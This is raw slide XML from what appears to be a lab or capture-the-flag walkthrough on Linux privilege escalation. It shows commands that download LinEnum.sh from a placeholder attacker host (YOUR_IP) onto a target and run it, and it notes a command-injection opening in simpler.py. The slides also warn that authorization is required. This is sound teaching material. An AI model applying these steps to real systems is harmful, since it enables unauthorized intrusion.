                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on the target machine and run it.</a:t>
            </a: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637941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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv Esc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Start with Linux Enumeration</a:t>
            </a:r>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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on the target machine and run it.</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[Locally]</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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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python –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 80</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[On Target Machine]</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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://YOUR_IP/LinEnum.sh</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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LinEnum.sh</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LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | tee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enum.txt</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897689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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv Esc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Start with Linux Enumeration</a:t>
            </a:r>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Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> on the target machine and run it.</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[Locally]</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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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python –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SimpleHTTPServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 80</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[On Target Machine]</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cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://YOUR_IP/LinEnum.sh</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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LinEnum.sh</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LinEnum.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | tee </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>enum.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="34290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Notice 2 interesting things:</a:t>
            </a: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8B34E439-2D61-7040-9D4A-5E19B747AF6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140962" y="6016443"/>
            <a:ext cx="5778500" cy="733778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36A879C-4C38-3945-96E4-1164CC0C9CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502357" y="4713981"/>
            <a:ext cx="5654343" cy="1227381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1372378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3642309" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv Esc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRP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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as Pepper. Let’s read through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to see if we can take advantage of this.</a:t>
            </a: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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32732086-4308-1947-9151-8B423EBD57EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="1746250"/>
            <a:ext cx="5092700" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6EDBB8-1E4D-FA4C-8239-A4FE843CDA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515134" y="1746250"/>
            <a:ext cx="2654300" cy="673100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3471742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2288931" cy="5646208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Esc</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www-data -&gt; Pepper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as Pepper. Let’s read through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>simpler.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to see if we can take advantage of this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365760" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32732086-4308-1947-9151-8B423EBD57EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610350" y="1746250"/>
            <a:ext cx="5092700" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6EDBB8-1E4D-FA4C-8239-A4FE843CDA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3515134" y="1746250"/>
            <a:ext cx="2654300" cy="673100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA887250-483A-334E-801F-C7C4D3C055AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3263900" y="2641600"/>
            <a:ext cx="3250534" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary: Calling this script with –p will call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exec_ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD312071-BC93-8949-AAA2-85B0F34960AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286353" y="3703935"/>
            <a:ext cx="8413278" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will attempt to filter that input, then run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>system command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (read: bash) with our user-supplied input placed directly in it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348643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94495-E6A2-F94D-AD68-0B703F8B5837}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="286603"/>
            <a:ext cx="10058400" cy="1450757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>DO NOT TRY THIS AT WORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Connector 44">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7" name="Graphic 26" descr="Irritant">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC9B23CC-EEDC-4C19-B228-1269EAF9D3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509" y="2472903"/>
            <a:ext cx="3031484" cy="3031484"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4CE3CF-6887-4947-8090-EC10F183F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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C7637DE-7ECE-C144-822C-F07431EFCB66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4483329" y="2109391"/>
            <a:ext cx="5947029" cy="3760891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="45720" rIns="0" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Scanning &amp; Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Should never be done without written authorization from owner and a clear definition of scope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Can have impact the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
